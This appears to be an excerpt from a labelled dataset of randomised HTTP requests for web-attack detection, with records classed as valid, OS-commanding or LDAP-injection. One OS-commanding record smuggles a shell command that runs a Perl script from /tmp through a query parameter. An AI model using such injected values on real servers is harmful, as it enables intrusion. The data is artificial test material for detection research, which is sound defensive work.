Authorization: hipejj svrag=efreaAt
Range: -74,-25
Referer: http://www.desrl.it/mirev/hhAsls/ipper3/h5notfse.jsp
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.4 (compatible; MSIE 0.6; Open BSD i386; yosieveso)
UA-CPU: StrongARM
UA-Disp: 0185,510,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 008x3318
Via: 0.5 www.bmrav8e.html, 2.4 57.15.211.108:257, 9.6 www.nnnaknhS.jpeg
Transfer-Encoding: compress
Upgrade: wleh/1.8
Warning: 344 www.BJasytN.css "r0la5" 
X-Forwarded-For: 242.10.119.24
X-Serial-Number: 82872435333808
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 2066
Start - Id: 11746
class: Valid
GET /hmcsoh/lcUig3vs-@/lSl/tmaxok/N5fl/rore6lNeflrldfi/sEgkcAq9n8L5EdmKs./haTitt34lieDv/aiEmnet.php?2oaiShee7ajaa=5&plxate3b8t=tnohilae5f52va&8eOrpghinhd=etaMtihy+5deletei&.KEegM_GJ=s8oj&iinre=%5Dvwt+t%3Be%3Clsu%3AeI&apiar7u1er5enae=includeO&eiaA=oeldcj&ne2ysln97ciaIio=k1yy&boot.inixmailB9K@G=aelmail&tfmfSFY=document+n+ht5m9ado8&y9u=97497&a1Cfea=ru3&dtebbAuOidlvadh=tgmrse3S HTTP/1.0
Host: 209.69.249.188
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: identity, deflate;q=0.8, gzip;q=0.1
Accept-Language: ite-0xyeai;q=0.1, a-in4ct
Cache-Control: max-stale
Client-ip: 202.7.189.170
Cookie: elcceao=hm7\&;u9toal=1723774;7RlibZCmWYE=65511183;t8sf2oFp4Ei=rL2h;6W.s08Ksam=a\e~linkvusrDx)8oDr3;m45ssnedsksAmy=0so
Cookie2: $Version="961"
Date: Sat, 16 Apr 05 20:00:52 GMT
ETag: "RAk7NPwff76_OWyBrej"
Expect: fpODc
From: ccsp3@ElRrgnej.biz
If-Modified-Since: Sat, 07 Jul 07 24:57:08 UTC
If-Unmodified-Since: Wed, 11 Feb 04 07:10:17 GMT
If-Match: *
If-None-Match: "iwdhbRmzDZhwzLzfMl15"
If-Range: *
Max-Forwards: 680
MIME-Version: 4.3
Pragma: feSo6l='ulm7css'
Proxy-Authorization: Digest response="aC035b73FACF986E93e1E771dF14eF2b"
Authorization: Digest uri=/itMh/4EdanT/5omrve/nsfsda.sh
Range: 826738-,52-
Referer: http://www.teeG.com/Tlddgcn.jpeg
TE: trailers,deflate;q=0.0,gzip
Trailer: Host
User-Agent: c5mce4klvefl4edRic
UA-CPU: x86
UA-Disp: 1077,6498,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 362x4409
Via: 8.1 www.sa0injnt.jpeg:32, FTP/7.4 www.rdl8R.htm, HTTP/0.2 174.40.125.127
Transfer-Encoding: compress
Upgrade: aiubsu/5.7, bEar3/1.8, k5eah/6.6, uatn/4.0
Warning: 669 www.rwxis.jpg:6311 "6cpttbsraneoe" 
X-Forwarded-For: 173.221.98.4
X-Serial-Number: 68893779
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11746
Start - Id: 23573
class: Valid
GET /MaJZdfR2/CZ/etse9enqyecnb/cVTXH/hedhjSsao8o/ieeKsh2aIdIar/rQXxYvDIy5NxBw/6.j/l6t8f-SYTSapIDjvA6.gif?edsIailot2cmy0c=%27&Earea8har3ret=bet&omony=rdD3er5wsP&zA8a=i%3F+e&6Upa6=eds+ysr&sepihu=8931427&lodd1iEdof=aoastsutuiuA&bnCtb2ioeltE=vasystem&eeijhRd=402479569&6f=377&dftswmday=71D6RyX.17f&oyghxgdyesEl=8158&yeL=itUe&6dIwp-tNk8VWVW=yBQ HTTP/1.0
Host: 199.86.146.108
Connection: keep-alive
Accept: text/xml;q=0.5
Accept-Charset: macintosh, ks_c_5601-1987, iso-2022-kr;q=0.2, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=30426
Client-ip: 231.131.37.145
Cookie: Eo2gsto=aXNTj;r1aaemxh=78;2eatsm=rrshagkteahr7drOkt;04sup=bhtswn;binuGweaccepto.=n&i];ord5uo7ne=hebopnsaspaqnn2e
Cookie2: $Version="413"
Date: Tue, 05 Jan 10 06:12:18 UTC
ETag: "NTdHbgXGAcqVmaz3"
Expect: eshv0r=Szdgedt;uOhaha9n
From: caat@loSde.net
If-Modified-Since: Sun, 04 Mar 07 09:51:01 GMT
If-Unmodified-Since: Mon, 17 Mar 08 01:51:51 CET
If-Match: *
If-None-Match: *
If-Range: "KdXetqETNquLXam"
Max-Forwards: 4113
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic dHJhSTppdDRkQWloaQ==
Authorization: Basic eWk4MGNlOnRnb3c=
Range: 62145-4,-94,41-
Referer: /sjdhdF/lwaFdn0i/eijsp.png
TE: trailers
Trailer: If-Match
User-Agent: v0IKJvJIA. http://www.8ptte.st
UA-CPU: StrongARM
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 4426x0282
Via: FTP/2.0 www.st9A.html, 8.5 248.245.94.238, 6.7 www.ele6loie.shtml
Transfer-Encoding: laea; daiA=ont1Z
Upgrade: yhlh/5.7, nern/8.3
Warning: 241 172.17.37.245 "tearnDtre" "Tue, 03 Jun 08 05:53:19 CET"
X-Forwarded-For: 73.5.140.170
X-Serial-Number: 1009110184973666911
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23573
Start - Id: 36740
class: OsCommanding
GET /5csJ0.5@iQj1NQgbJ/re/iJpcv.iHqXennPPZYR7/ox-nf/5jNqezIZ7n.jsp?Eotoof8eYzt=asock_streamuo&asuislzuutgtiif=8&9@C2z=fhAmnoeannhwo&e6Y=lnull%3Brngy+pri&I3Vi=863&Etl1=aXjw&Rfy=%2Fperl+%2Ftmp%2Ficti.pl++-p5392&firCatcocb4retc=OV7d&SXfmktFsrsra0=610&n9mArbm4a=139 HTTP/1.1
Host: www.dl9watqs.uk
Connection: eabese9i
Accept: application/zip, image/*, video/mpeg;q=0.0
Accept-Charset: x-mac-turkish;q=0.5, iso-8859-8-i;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2107
Client-ip: 114.229.84.195
Cookie: 6n9t=mae;sdelje=5173;iEoeN=e6vedXwm6_;n03Ppnmpryfsyo=278
Cookie2: $Version="0"
Date: Sun, 25 May 08 22:07:53 GMT
ETag: W/"v6esBToa8rBZN4FOv"
Expect: iuowlu=arrod;at3irEyt=cnoiy
From: 9rrtotci@rtshul.org
If-Modified-Since: Fri, 31 Oct 08 19:34:17 GMT
If-Unmodified-Since: Sun, 01 Feb 09 16:12:57 GMT
If-Match: "Bzp4oCgH-jAMrEt"
If-None-Match: "jCQ.nuPqlOxdDxD"
If-Range: Tue, 11 Oct 05 05:17:18 GMT
Max-Forwards: 1
MIME-Version: 3.9
Pragma: ipi='n8a1Z'
Proxy-Authorization: Digest algorithm=Rrf1lpt
Authorization: Digest response="6eAEeC1c77C470AcDca6aE6CaA0D1D4f"
Range: 87-896750,1933-,495454-79783
Referer: /tejadee/2qyeejiu/zelzz.jpeg
TE: gzip;q=0.2
Trailer: From
User-Agent: Mozilla/9.2 (X11; U; Linux i386 3.9; ie-df; rv:9.8.9) Gecko/32549623
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1003x5848
Via: uwoe/8.8 227.139.112.151
Transfer-Encoding: gzip
Upgrade: evenU/1.9, Quheec/0.8, sieT/8.6, e9Rslt/7.3, iZner/9.0
Warning: 867 151.26.59.212 "etraSdoEtTi83ctsms0" 
X-Forwarded-For: 246.253.133.9
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36740
Start - Id: 31065
class: Valid
GET /L0gl/Tv2susheoa71/ttmyN9_5CyqT3ZOqQw/aDGKu_kY0h.2z39BC1dA/rnacdMid.gif?QZphpIq=ihtoMorEs&ayR=ui1t&tp=tyOF&ijapnkwoiafian=+%25it&andue=bhttpsidnblgfnak%3C3%3A&patEuszLsnaso=3490300548&CoAkk=nw-ed&cxrxstimo=hets8O3bogdr0ea&nmeeoyvs3qiwg=fimif HTTP/1.0
Host: 59.126.142.61
Connection: close
Accept: text/*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate, compress
Accept-Language: *
Cache-Control: max-age=12932
Client-ip: 23.249.165.211
Cookie: lte=6sozt;o5bow1m=r3P;5aEjt=aazsgefzeKn
Cookie2: $Version="69"
Date: Mon, 02 Jan 06 02:28:30 UTC
ETag: W/"UHmlLqgMwHtvrSN"
Expect: imamsYsm
From: 7hh6G@iXrAni.uk
If-Modified-Since: Sun, 16 Oct 05 11:50:14 GMT
If-Unmodified-Since: Thu, 08 Jan 04 21:17:25 GMT
If-Match: "j8UOuU2asrHKBQDFhF7"
If-None-Match: "ODQe2XECcIV7dxtOa2SO"
If-Range: *
Max-Forwards: 9
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="zish9"
Authorization: Basic d3Jobzo1b2lkYw==
Range: 82230-
Referer: /i7ubyA/epsm/lmtanoe4/hehrnoco/tcsHaalo.shtml
TE: trailers,trailers,gzip;q=0.9
Trailer: Accept-Encoding
User-Agent: reePeye/9.7.4
UA-CPU: 68000
UA-Disp: 7666,0977,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 295x182
Via: 0.5 79.201.144.251, 1.8 www.oouoe.js
Transfer-Encoding: deflate
Upgrade: hme/3.6, eGif/4.2, 3ai/5.4, iFpet/8.3
Warning: 836 www.egnAek.shtml:406 "erkeES8uldsfsrytaIhi" "Sun, 28 Aug 05 15:14:21 CET"
X-Forwarded-For: 212.22.173.189
X-Serial-Number: 0797621
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31065
Start - Id: 30381
class: Valid
GET /ionyct/RRyrdocument/jcsae/uhR68ont8T/e7aYraCRWU6Vh2rK/i@vLK9fquX6v/sUxB/pNbj/itmia8aoe4C2tesR/dUenPDddriei1s.dll?rsfo4oIoar=97&u0ioaes5mlct=mtaus&eAgn5Tn=u2WMQ0&ih2an2hx0uzE=840458&EHy.b=3469432&dOazrVyar=a+Fmi&EINoyriv=nndQ&osrhso4mdwi6t=%3FsX8snTrm&aoig=435&ofvrm6ePdj=aos+eoe&@UwinntosamMwR=hetkgiWe&tel=4994277&P@3eXJ9AS=%3Clbeln+4do%28lfaes&usdmu1efedis7=sntz57tkSuAin HTTP/1.0
Host: 82.98.190.157:563
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: shift_jis
Accept-Encoding: deflate, gzip, deflate;q=0.9, gzip
Accept-Language: *;q=0.5
Cache-Control: min-fresh=94
Client-ip: 116.125.168.110
Cookie: usiRoeme1=4;ysoQvobnoTvs=ho;pius3pSrcn1=6590519545;f9xvdOoanh=(gkShttsw1s;cnewrgK=Uqlrmroleneb;bpSnZCc_=3152
Cookie2: $Version="63"
Date: Fri, 12 Jun 09 01:24:15 UTC
ETag: W/"h54s0OY2yY1ehAm1hjup"
Expect: irloe=dsKep;sb3ik
From: eonljol@h9iohse.fr
If-Modified-Since: Sat, 21 Nov 09 07:32:08 UTC
If-Unmodified-Since: Mon, 14 Sep 09 02:46:39 GMT
If-Match: *
If-None-Match: *
If-Range: "BxmgI2x_taHLW6LYE5"
Max-Forwards: 3
MIME-Version: 4.2
Pragma: hRPstk=efe
Proxy-Authorization: ltwa aarnA=yustwx
Authorization: Basic b2h0aHQ6b3JwdG8=
Range: -4
Referer: /owEd.php3
TE: trailers
Trailer: Date
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 7.5; ih-ss; rv:9.3.6) Gecko/32785134
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9503x4246
Via: nhsn12/5.3 www.baisnohl.tiff
Transfer-Encoding: gzip
Upgrade: bhHcwU/7.0, m4tay/8.3
Warning: 906 www.li3ogeT.jpg "oo7NnrsaEitoagsnnip" "Wed, 04 Jul 07 09:26:22 UTC"
X-Forwarded-For: 179.94.180.111
X-Serial-Number: 4261996881393
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30381
Start - Id: 26031
class: Valid
GET /it/hndtra45iea/iK.asp?eyweeerweoiearh=dbl92cS&.@904l=o+nQEoehanc%29execYi&pccaute5=n.92jqFWXS HTTP/1.1
Host: www.KR3nohvoae.st
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman;q=0.9, x-mac-cyrillic;q=0.0, iso-2022-kr, utf-7
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 34.105.255.188
Cookie: iobn=jkcrotiwhrusnl
Cookie2: $Version="7"
Date: Sun, 02 May 04 10:00:35 CET
ETag: "7wUBl2V0wMQ5Eg3Es"
Expect: 100-continue
From: 3seat2ct@Cn4ntSeii.com
If-Modified-Since: Thu, 03 Jan 08 18:43:53 GMT
If-Unmodified-Since: Sat, 25 Aug 07 19:18:47 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 27 Apr 10 12:00:00 GMT
Max-Forwards: 261
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic bmJPbWVvc2g6Y2VXbjVvNw==
Authorization: Basic bmVobHpyOlJlc2U=
Range: -7
Referer: /od90eqe3/soeMAihr/cthEh.gif
TE: trailers,chunked,trailers
Trailer: Warning
User-Agent: Mozilla/2.8 (Windows; U; WinNT 0.8; et-v1; rv:4.6.2) Gecko/74821217
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4161x5305
Via: ty5ma/3.8 185.155.113.245, HTTP/5.0 31.156.164.60
Transfer-Encoding: compress
Upgrade: lr6nji/0.6, no2fo6/1.2
Warning: 936 www.ab27.html "s2azr0" 
X-Forwarded-For: 212.160.180.28
X-Serial-Number: 6743288486222977
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26031
Start - Id: 10079
class: Valid
GET /ee2fth/_Tr1heLz2EevalfchildG_.jpg? HTTP/1.0
Host: 174.150.10.17
Connection: o3Uionmr
Accept: */*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 8.204.80.232
Cookie: ivhGuli=ej0Udupm6;leerySlanf=oetYoaJlan;zhesa6rarttan=h;ohmtd=164;mhzl3sj=rdtVZmaw-2
Cookie2: $Version="231"
Date: Fri, 17 Mar 06 01:39:35 CET
ETag: W/"Tw9hk2SDw2rnBAKa2m"
Expect: nEndi
From: aemYeste@u736nnw.biz
If-Modified-Since: Fri, 08 Sep 06 13:19:55 GMT
If-Unmodified-Since: Fri, 08 Jul 05 24:29:42 GMT
If-Match: *
If-None-Match: "3vLXk2kCGt@sp7QM27sN"
If-Range: "keP9uvYISOomEjpR"
Max-Forwards: 5
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic d2lia25yczpzNnR0
Authorization: Basic bHROb3RpcTpSbmhlZXRl
Range: 1978-3,68-
Referer: http://gtptya.gov/eocs/r6ctbts/abur/nuntx.conf
TE: chunked,trailers,gzip
Trailer: Connection
User-Agent: yeusDhf
UA-CPU: 68000
UA-Disp: 886,964,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6453x8240
Via: 4.4 209.92.162.230, 9.6 204.21.198.110:9, 7.1 196.104.119.22
Transfer-Encoding: deflate
Upgrade: eli/4.7, 0iu5ie/2.0, hlvc3/8.3
Warning: 775 160.139.89.107 "jar0wts" 
X-Forwarded-For: 219.87.157.60
X-Serial-Number: 78634326822916597
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10079
Start - Id: 14330
class: Valid
GET /srleaitovetse/nnn/imgJ-Loq4M.swf?BJUoFp=Nxw+hosj%3Fsbtit&Oieo=899283&JhL749T2PB=4173&Uqtoe=1+passthru%5D%3Fcd%3Bnrcpel%3Cn&GrPeg7eate=aaDtqlas&leNpsdtsiiy=38568&ecagbsnaoh=inlo&CAWCxNMSo=eBddz HTTP/1.0
Host: 114.94.134.203
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic, isiri-3342;q=0.6, euc-jp
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 62.65.141.139
Cookie: g1MRcv1=oTM0r6dGQJpg;eval1jmMxXuP=pranstQceE3srho;1e6ttsrkh=Tenwwuoulnii3ei;cQprllzi3deuait=rhsdeany
Cookie2: $Version="48"
Date: Fri, 26 Oct 07 20:51:03 GMT
ETag: "Xrde-JvqITgQdSr_"
Expect: 100-continue
From: hRagoz@mdeso9.st
If-Modified-Since: Wed, 10 Mar 10 21:41:57 CET
If-Unmodified-Since: Fri, 03 Apr 09 02:17:50 GMT
If-Match: "Y4wI8xOlBrOytRMVAptt"
If-None-Match: *
If-Range: Mon, 24 Nov 08 16:04:12 UTC
Max-Forwards: 9071
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM dXRFY1NlYXJlc290b25lcmFmbWhvc3VicmF1dWxoc2VpaGllcndtaXNhYzA=
Authorization: Basic dG40YTkyaDphUGV3dG1p
Range: 44-41,-8,-787777
Referer: http://yOtga.biz/ktmdern/vtNis/aihRnzar/eede.png
TE: gzip,trailers
Trailer: From
User-Agent: arhnthotnvtl5rwf
UA-CPU: MIPS
UA-Disp: 5219,163,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2649x359
Via: 4.6 99.59.219.145
Transfer-Encoding: compress
Upgrade: 9sii2/1.4
Warning: 869 www.s98uEo.css "er1dzcr" 
X-Forwarded-For: 131.202.186.153
X-Serial-Number: 04884664
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 14330
Start - Id: 10514
class: Valid
GET /baiErDs/Jyzg-foqperlU9@/oSdeEWiovcefp/rAnLoo6F6DXXo/icmelaheueyfcm/sdg3dfm0mr0cr6trneEh/s5MCK@fA/oVhRUgymR1-rwkAO/jA26oytnrfi/e5ttwweb7a.css?tvia=tirnss&ktp=vJv3qPCl&nbtBnaom6t2ote=7&EcwoSnrt53sisn=n&Baccess_log1passthru=lpj8bpzYg&g0c9phrsahi=0011&flnduwleks=tlt&cf9hin5h0aeoai=likegco9c8AerSasayobjecth HTTP/1.0
Host: www.dnNnntr.gov:4
Connection: keep-alive
Accept: audio/basic, video/mpeg
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.1
Accept-Language: *
Cache-Control: y0bsnt=Hs
Client-ip: 213.36.134.7
Cookie: e5eqoecsJn=cut83etceenNe;smo=d;ott5arishse=sn%ug;UlvhttpslXh.T=hrl$)6>o6
Cookie2: $Version="25"
Date: Tue, 18 Aug 09 12:00:26 UTC
ETag: "GPGbZZ5jTNw4Y5hp"
Expect: 100-continue
From: r1ahidt@tnaomtA.it
If-Modified-Since: Thu, 07 Jan 10 14:14:32 CET
If-Unmodified-Since: Mon, 07 May 07 13:44:53 UTC
If-Match: *
If-None-Match: "JcfaQiuJhyZtnWcj"
If-Range: *
Max-Forwards: 54
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic ZG1pcVNkcjM6aGFucng=
Authorization: NTLM cmVvcmNsdWhlbWVzenBsMmVCNEhvaWVldWxodGxwMnA=
Range: -11352
Referer: /ndIietgh/aFrecae/okslodi.sh
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: feicetaa/2.8.1.1.5
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4657x757
Via: 3.3 74.191.44.96, 8.6 212.17.106.245
Transfer-Encoding: deflate
Upgrade: tl5/3.7, osrmh/0.5, mlszd/1.0, ruai/3.2, hde/0.2
Warning: 876 92.101.176.229 "roortcwwki3otne" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 44987486
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10514
Start - Id: 5839
class: Valid
POST /eOsoGXL1/hardo3/d0B-.g/sYlAp3M@8avHbqW/emr.@LJk1aswb6H8s_a/oxp_2.mspx? HTTP/1.1
Content-Length: 12
Content-Language: v,ydlors0
Content-Encoding: deflate
Content-Location: http://www.soaeirwj.ch/eaemdr/5ohs8ta/trRw/DLtautfp/tntbds2.jpeg
Content-MD5: aGlyZm9yQXRlU3dpYTBldA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 May 05 18:01:30 CET
Last-Modified: Wed, 25 Feb 09 22:52:09 GMT
Host: www.nLbiYfeage.gov
Connection: eVhwphi
Accept: */*
Accept-Charset: windows-1254, utf-7;q=0.1, cp-950;q=0.0, hz-gb-2312;q=0.9, euc-tw;q=0.9
Accept-Encoding: 
Accept-Language: tt9b-eble, talGse-0, tler6-aaiee;q=0.0
Cache-Control: max-age=98
Client-ip: 127.171.94.127
Cookie: sTna5Tlcarr=linkjU8t8:ohrCghrbeao;enO4rlteh=epLc;SrnullVlog=156;60l2EkbXJ=oitatsshcashrK9i;u8as1A=30739;rrvlg1nro=491
Cookie2: $Version="141"
Date: Mon, 28 Mar 05 16:41:43 CET
ETag: W/"4xTR0hwI4@WsOot@zvMm"
Expect: 100-continue
From: sePnirh@e4qne.de
If-Modified-Since: Sun, 15 Aug 04 15:57:31 GMT
If-Unmodified-Since: Mon, 15 Sep 08 15:11:26 GMT
If-Match: *
If-None-Match: "8UbUHydHktmNpkISvj"
If-Range: "QaMj@8TzuK-SrmIiSM"
Max-Forwards: 6492
MIME-Version: 8.7
Pragma: a=agDazhx
Proxy-Authorization: NTLM dHdzcGVzcnZudGhiTmhlbXRkaGZkZXJvOXBrMGhjZXN1MmFyaHRubm8=
Authorization: Basic czFwdHRkczplY3ZpZQ==
Range: 4-,812-694413
Referer: http://www.conlnx3.fr/s1qhwoeg/dEeetI/eEausSet/rtuU/pirnea9.htm
TE: chunked;q=0.4
Trailer: Range
User-Agent: o5stJrn (6EUcX2Z1-z; iAwA7Du3I-; aWfwdLh; mQicMek-)
UA-CPU: 68000
UA-Disp: 746,1087,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3215x099
Via: FTP/6.9 www.msent.tiff:4322, 0.5 78.223.25.213, 7.0 88.151.48.109
Transfer-Encoding: deflate
Upgrade: e4c/1.1, hhpf/8.4, n1mot/3.4, n6dla/3.5
Warning: 161 210.131.126.108 "bzrjUioaiertes" "Tue, 24 Jun 08 01:01:36 GMT"
X-Forwarded-For: 10.142.82.192
X-Serial-Number: 8692230651
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nhIa=pst6vhl

End - Id: 5839
Start - Id: 21818
class: Valid
GET /tf9g3uBlJrVVjzyMem.jpeg? HTTP/1.0
Host: www.Ie8ac.be
Connection: netq
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, gzip;q=0.0, deflate;q=0.0, compress;q=0.7, deflate;q=0.1
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 196.172.163.174
Cookie: dl=aIm_fG8ta
Cookie2: $Version="6"
Date: Sat, 09 May 09 22:49:57 GMT
ETag: W/"R5lCvqAM8NjhhWf0sjS"
Expect: e9ns
From: xeSesas@ehlnerstil.com
If-Modified-Since: Wed, 07 Apr 04 11:31:32 GMT
If-Unmodified-Since: Thu, 16 Aug 07 05:35:47 CET
If-Match: "sejn6hxGO_6PgsTRIMcV"
If-None-Match: *
If-Range: Wed, 07 Jan 09 14:12:39 CET
Max-Forwards: 1107
MIME-Version: 1.2
Pragma: tnefEd0R=heaht
Proxy-Authorization: NTLM cXJlYXNDbkE2enhlbW40aHI0emdld2hlb296aWU3bm4=
Authorization: 4z9er vahih=tey9oe
Range: 728147-66,8714-380,41-
Referer: http://www.rYtu.fr/npda8m/onsv/arge.jpeg
TE: deflate,trailers,trailers
Trailer: Accept-Charset
User-Agent: oope/3.8.5.7.9
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 318x304
Via: HTTP/8.9 www.yu8nrre.css, 8.2 213.164.192.104
Transfer-Encoding: deflate
Upgrade: eAsu/5.0, gdb/6.1
Warning: 052 www.rdtt1ah.js "6g169" 
X-Forwarded-For: 32.5.142.115
X-Serial-Number: 8436166703567420278
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21818
Start - Id: 2136
class: Valid
GET /fFrNW/azUG/lb9jz/K4formEk6G.cfm?peancd=rn&Tes=6&jUhgbAeaeDp=tybYy%25f5bes%5B&eota=wr&uOFwV5i=b%3Dtn%27tmptsexa+%3Feh&ieiptdfpt=stb2n7Rosesoysehth&iai=alnt&m0drrIrocdkere=catxatueeandtihaozAo%3B&scprehtl4s1ljn=9624354034&omhOeszRu3=3696761623 HTTP/1.1
Host: 203.56.17.245:4986
Connection: keep-alive
Accept: image/gif
Accept-Charset: windows-1255;q=0.6, us-ascii;q=0.3, shift_jis, iso-8859-5;q=0.6, iso-8859-8
Accept-Encoding: identity;q=0.3, identity;q=0.4
Accept-Language: ortae-a;q=0.5, bcei4a-ow;q=0.2
Cache-Control: min-fresh=481
Client-ip: 52.80.212.176
Cookie: ccEfhhdb=9;ezen=oeuh2ccnqeQusmi;oilhu7tn1tm=1yph8draiu9s3;V4qXEIiRaccess_logsprocessing-instruction4=i>i;pBBsock_stream=Dugawrrso:shoE
Cookie2: $Version="376"
Date: Sun, 12 Feb 06 20:41:07 UTC
ETag: W/"BnqZIXIT1Bd.Q6trON"
Expect: 100-continue
From: m5h3d@tewicbp3ee.be
If-Modified-Since: Fri, 01 Oct 04 13:05:05 UTC
If-Unmodified-Since: Mon, 23 Aug 04 08:15:24 CET
If-Match: "cRuB4Oi3Erf8B3DW-"
If-None-Match: "56EmPlz9@iPWUK2N"
If-Range: "FoUgO1twMURct_Iuy"
Max-Forwards: 40
MIME-Version: 0.9
Pragma: 9t=ibalooo
Proxy-Authorization: htvp2s zeui=5aihmEt
Authorization: NTLM YUh3YXBpc3Jrbzdkc2hvZWhldTQzbzFuNmhpZWVlZVBobWVuNHRldHRuZWE3ckU=
Range: 9797-
Referer: /eotmR/iIhnS.swf
TE: trailers,chunked,trailers
Trailer: From
User-Agent: Mozilla/1.4 (Windows; U; Win98 9.5; nI-vd; rv:5.9.7) Gecko/88260218
UA-CPU: MIPS
UA-Disp: 1987,388,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 539x1521
Via: 0.5 111.142.138.186
Transfer-Encoding: deflate
Upgrade: LqnoEm/4.0, 2Odnr/2.0, ioip/3.7, qMe/8.4
Warning: 103 16.229.84.252 "ansoitetCmtnv8" 
X-Forwarded-For: 209.131.51.221
X-Serial-Number: 9895241717803854226
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2136
Start - Id: 37525
class: LdapInjection
PUT /bnCG9kpYEo/dEqTqdJJ8N-9D3DIsYva/n2dh/e43sie/cnHEhsceyttsaraoie3z/1tClwG9qG/erOFi1Ehnee/n3ietiw/r19ONQT3BJQ/we/9metcxtermPphpC/s4eseinlslhvexeAta.sh? HTTP/1.1
Content-Length: 102
Content-Language: eomh3,ch
Content-Encoding: identity
Content-Location: http://www.xiewh.fr/owtsnn/d0rt/Esihr/ccsGto/ghoef.txt
Content-MD5: bjFycTJzaWFtOGRsdWRucg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Aug 05 18:21:19 CET
Last-Modified: Tue, 20 Apr 04 21:19:49 CET
Host: www.orcapg.fr:80
Connection: oEhcf8
Accept: audio/basic
Accept-Charset: cp-950
Accept-Encoding: 
Accept-Language: tnqctyrl-nezeo, 0rnahq-tldhmnf9;q=0.1, ea-E;q=0.6
Cache-Control: min-fresh=26
Client-ip: 106.155.251.0
Cookie: r73SokHQ8r=5;tehiy8hEtqe= yg ;a9s8tr7Lnnceq=6
Cookie2: $Version="192"
Date: Tue, 06 Dec 05 02:01:17 UTC
ETag: "eRBcLEPpUSsRmtpuW-pP"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 17 Jan 08 11:22:36 CET
If-Unmodified-Since: Thu, 22 Mar 07 01:29:52 CET
If-Match: *
If-None-Match: *
If-Range: "V9jx2CQYpKH4r6HIUp"
Max-Forwards: 2188
MIME-Version: 3.0
Pragma: tNnpheyr='ron'
Proxy-Authorization: NTLM bmFsZnRybWs1VG1ybmVlTGh3Z2l3dDVGZDFubnNib0EwOWl3bTRoUnZOMm53aW9p
Authorization: 0asc eGcueeu=UjMt4nt
Range: 0516-7855,069180-,334-
Referer: /teUhg.html
TE: trailers
Trailer: Expect
User-Agent: exzflaonag17u
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 428x4367
Via: 1.2 www.ehahtVc.gif
Transfer-Encoding: identity
Upgrade: 6ciYs/4.5, tUt/0.1, hmo/8.6, HPozai/2.7, 4rIvIy/9.5
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569
----: ----------------
~~~~~: ~~~~~~~~~~~~

